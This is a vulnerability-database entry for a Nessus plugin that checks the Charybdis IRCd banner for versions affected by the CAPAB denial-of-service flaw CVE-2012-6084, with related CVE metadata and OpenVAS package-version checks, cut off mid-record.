ID IRCD_CHARYBDIS_CAPAB_DOS.NASL Type nessus Reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-03-02T00:00:00
Description
The remote host is running a version of Charybdis IRCd that is affected
by a denial of service (DoS) vulnerability. An issue exists in the
'CAPAB' module in 'm_capab.c' that causes servers to improperly handle
negotiation handshakes.
An unauthenticated, remote attacker could exploit this issue with a
specially crafted request, impacting the availability of the service.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(65196);
script_version("1.5");
script_cvs_date("Date: 2019/11/27");
script_cve_id("CVE-2012-6084");
script_bugtraq_id(57085);
script_name(english:"Charybdis IRCd m_capab.c Denial of Service");
script_summary(english:"Checks the version of the remote Charybdis IRCd");
script_set_attribute(attribute:"synopsis", value:
"The remote chat server is affected by a denial of service
vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host is running a version of Charybdis IRCd that is affected
by a denial of service (DoS) vulnerability. An issue exists in the
'CAPAB' module in 'm_capab.c' that causes servers to improperly handle
negotiation handshakes.
An unauthenticated, remote attacker could exploit this issue with a
specially crafted request, impacting the availability of the service.");
script_set_attribute(attribute:"see_also", value:"http://rabbit.dereferenced.org/~nenolod/ASA-2012-12-31.txt");
script_set_attribute(attribute:"solution", value:
"Upgrade to Charybdis 3.4.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/12/31");
script_set_attribute(attribute:"patch_publication_date", value:"2012/12/31");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/11");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ratbox:ircd-ratbox");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ircd.nasl");
script_require_keys("Settings/ParanoidReport");
script_require_ports("Services/irc", 6667);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
appname = "Charybdis IRCd";
port = get_service(svc:"irc", default:6667, exit_on_fail:TRUE);
banner = get_kb_item_or_exit("irc/banner/"+port);
if ("charybdis" >!< banner) audit(AUDIT_NOT_DETECT, appname, port);
version = ereg_replace(string:banner, pattern:": *[^ ]+ +[0-9]+ +[a-zA-Z0-9]+ +([^ ]+) +[^ ]+ *:(.*)", replace:"\1 \2");
pattern = "charybdis-?(([0-9\.]+-?([0-9]+)?)(|-?dev\d?|-?rc\d?)?)\(";
match = eregmatch(pattern:pattern, string:version);
if (isnull(match)) exit(1, "Failed to extract the version of "+appname+" listening on port "+port+".");
full_ver = match[1];
if (report_paranoia < 2) audit(AUDIT_PARANOID);
fixed = '3.4.2';
if (full_ver =~ "^([0-2]\.|3\.[0-3]\.|3\.4\.[0-1]($|[^0-9])|3\.4\.2[^0-9])")
{
if (report_verbosity > 0)
{
report =
'\n Version source : ' + chomp(banner) +
'\n Installed version : ' + full_ver +
'\n Fixed version : ' + fixed + '\n';
security_warning(port:port,extra:report);
}
else security_warning(port);
exit(0);
}
else audit(AUDIT_LISTEN_NOT_VULN, appname, port, full_ver);
{"id": "IRCD_CHARYBDIS_CAPAB_DOS.NASL", "bulletinFamily": "scanner", "title": "Charybdis IRCd m_capab.c Denial of Service", "description": "The remote host is running a version of Charybdis IRCd that is affected\nby a denial of service (DoS) vulnerability. An issue exists in the\n'CAPAB' module in 'm_capab.c' that causes servers to improperly handle\nnegotiation handshakes. \n\nAn unauthenticated, remote attacker could exploit this issue with a\nspecially crafted request, impacting the availability of the service.", "published": "2013-03-11T00:00:00", "modified": "2021-03-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/65196", "reporter": "This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://rabbit.dereferenced.org/~nenolod/ASA-2012-12-31.txt"], "cvelist": ["CVE-2012-6084"], "type": "nessus", "lastseen": "2021-03-01T03:32:31", "edition": 26, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-6084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892612", "OPENVAS:892612", "OPENVAS:1361412562310121196"]}, {"type": "zdt", "idList": ["1337DAY-ID-20103"]}, {"type": "gentoo", "idList": ["GLSA-201405-21"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12843", "SECURITYVULNS:DOC:28972"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201405-21.NASL", "IRCD_RATBOX_CAPAB_DOS.NASL", "DEBIAN_DSA-2612.NASL", "IRCD_SHADOWIRCD_CAPAB_DOS.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119238"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2612-1:DE325", "DEBIAN:DSA-2612-2:5F851"]}], "modified": "2021-03-01T03:32:31", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-03-01T03:32:31", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65196);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2012-6084\");\n script_bugtraq_id(57085);\n\n script_name(english:\"Charybdis IRCd m_capab.c Denial of Service\");\n script_summary(english:\"Checks the version of the remote Charybdis IRCd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote chat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Charybdis IRCd that is affected\nby a denial of service (DoS) vulnerability. An issue exists in the\n'CAPAB' module in 'm_capab.c' that causes servers to improperly handle\nnegotiation handshakes. \n\nAn unauthenticated, remote attacker could exploit this issue with a\nspecially crafted request, impacting the availability of the service.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rabbit.dereferenced.org/~nenolod/ASA-2012-12-31.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Charybdis 3.4.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ratbox:ircd-ratbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ircd.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/irc\", 6667);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"Charybdis IRCd\";\n\nport = get_service(svc:\"irc\", default:6667, exit_on_fail:TRUE);\n\nbanner = get_kb_item_or_exit(\"irc/banner/\"+port);\nif (\"charybdis\" >!< banner) audit(AUDIT_NOT_DETECT, appname, port);\n\nversion = ereg_replace(string:banner, pattern:\": *[^ ]+ +[0-9]+ +[a-zA-Z0-9]+ +([^ ]+) +[^ ]+ *:(.*)\", replace:\"\\1 \\2\");\npattern = \"charybdis-?(([0-9\\.]+-?([0-9]+)?)(|-?dev\\d?|-?rc\\d?)?)\\(\";\nmatch = eregmatch(pattern:pattern, string:version);\nif (isnull(match)) exit(1, \"Failed to extract the version of \"+appname+\" listening on port \"+port+\".\");\nfull_ver = match[1];\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfixed = '3.4.2';\nif (full_ver =~ \"^([0-2]\\.|3\\.[0-3]\\.|3\\.4\\.[0-1]($|[^0-9])|3\\.4\\.2[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + chomp(banner) +\n '\\n Installed version : ' + full_ver +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, appname, port, full_ver);\n", "naslFamily": "Misc.", "pluginID": "65196", "cpe": ["cpe:/a:ratbox:ircd-ratbox"], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:59:57", "description": "modules/m_capab.c in (1) ircd-ratbox before 3.0.8 and (2) Charybdis before 3.4.2 does not properly support capability negotiation during server handshakes, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a malformed request.\nPer http://cwe.mitre.org/data/definitions/476.html 'NULL Pointer Dereference'", "edition": 6, "cvss3": {}, "published": "2013-01-01T15:55:00", "title": "CVE-2012-6084", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6084"], "modified": "2013-02-02T05:10:00", "cpe": ["cpe:/a:ircd-ratbox:ircd-ratbox:2.2.5", "cpe:/a:ircd-ratbox:ircd-ratbox:1.1.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.2", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.9", "cpe:/a:ircd-ratbox:ircd-ratbox:1.0", "cpe:/a:ircd-ratbox:ircd-ratbox:1.3.1", "cpe:/a:ircd-ratbox:ircd-ratbox:1.5.3", "cpe:/a:ircd-ratbox:ircd-ratbox:1.2.3", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.5", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.7", "cpe:/a:ircd-ratbox:ircd-ratbox:1.3.2", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.3", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.3", "cpe:/a:ircd-ratbox:ircd-ratbox:1.5.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.3", "cpe:/a:ircd-ratbox:ircd-ratbox:1.3", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.0", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.2", "cpe:/a:ratbox:ircd-ratbox:3.0.7", "cpe:/a:ircd-ratbox:ircd-ratbox:1.2.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.6", "cpe:/a:ircd-ratbox:ircd-ratbox:1.2.2", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.10", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.7", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.7.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.7", "cpe:/a:ircd-ratbox:ircd-ratbox:1.5.2", "cpe:/a:ircd-ratbox:ircd-ratbox:1.5", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.9", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.8", "cpe:/a:ircd-ratbox:ircd-ratbox:1.4", "cpe:/a:ircd-ratbox:ircd-ratbox:1.1.2", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.0", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.8", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.8", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.5", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.1", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.11", "cpe:/a:ircd-ratbox:ircd-ratbox:2.1.4", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.4", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.2", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.4", "cpe:/a:ircd-ratbox:ircd-ratbox:2.0.6", "cpe:/a:ircd-ratbox:ircd-ratbox:2.2.6"], "id": "CVE-2012-6084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6084", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ratbox:ircd-ratbox:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:ircd-ratbox:ircd-ratbox:2.0.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:51:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "description": "It was discovered that a bug in the server capability negotiation code of\nircd-ratbox could result in denial of service.", "modified": "2017-07-07T00:00:00", "published": "2013-02-10T00:00:00", "id": "OPENVAS:892612", "href": "http://plugins.openvas.org/nasl.php?oid=892612", "type": "openvas", "title": "Debian Security Advisory DSA 2612-2 (ircd-ratbox - programming error)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2612.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2612-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"ircd-ratbox on Debian Linux\";\ntag_insight = \"ircd-ratbox is a full featured ircd. It is the primary ircd used on EFNet,\ncombining the stability of an ircd required for a large production network\ntogether with a rich set of features making it suitable for use on smaller\nnetworks.\";\ntag_solution = \"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.0.6.dfsg-2+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.0.7.dfsg-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.0.7.dfsg-3.\n\nWe recommend that you upgrade your ircd-ratbox packages.\";\ntag_summary = \"It was discovered that a bug in the server capability negotiation code of\nircd-ratbox could result in denial of service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892612);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-6084\");\n script_name(\"Debian Security Advisory DSA 2612-2 (ircd-ratbox - programming error)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-02-10 00:00:00 +0100 (Sun, 10 Feb 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2612.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ircd-ratbox\", ver:\"3.0.6.dfsg-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ircd-ratbox-dbg\", ver:\"3.0.6.dfsg-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ircd-ratbox\", ver:\"3.0.7.dfsg-3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ircd-ratbox-dbg\", ver:\"3.0.7.dfsg-3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "description": "It was discovered that a bug in the server capability negotiation code of\nircd-ratbox could result in denial of service.", "modified": "2019-03-18T00:00:00", "published": "2013-02-10T00:00:00", "id": "OPENVAS:1361412562310892612", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892612", "type": "openvas", "title": "Debian Security Advisory DSA 2612-2 (ircd-ratbox - programming error)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2612.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2612-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892612\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-6084\");\n script_name(\"Debian Security Advisory DSA 2612-2 (ircd-ratbox - programming error)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-10 00:00:00 +0100 (Sun, 10 Feb 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2612.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"ircd-ratbox on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.0.6.dfsg-2+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.0.7.dfsg-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.0.7.dfsg-3.\n\nWe recommend that you upgrade your ircd-ratbox packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that a bug in the server capability negotiation code of\nircd-ratbox could result in denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"ircd-ratbox\", ver:\"3.0.6.dfsg-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ircd-ratbox-dbg\", ver:\"3.0.6.dfsg-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ircd-ratbox\", ver:\"3.0.7.dfsg-3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ircd-ratbox-dbg\", ver:\"3.0.7.dfsg-3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6084"], "description": "Gentoo Linux Local Security Checks GLSA 201405-21", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121196", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201405-21", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201405-21.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121196\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:14 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201405-21\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered in Charybdis and ShadowIRCd. Please review the CVE identifier referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201405-21\");\n script_cve_id(\"CVE-2012-6084\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", 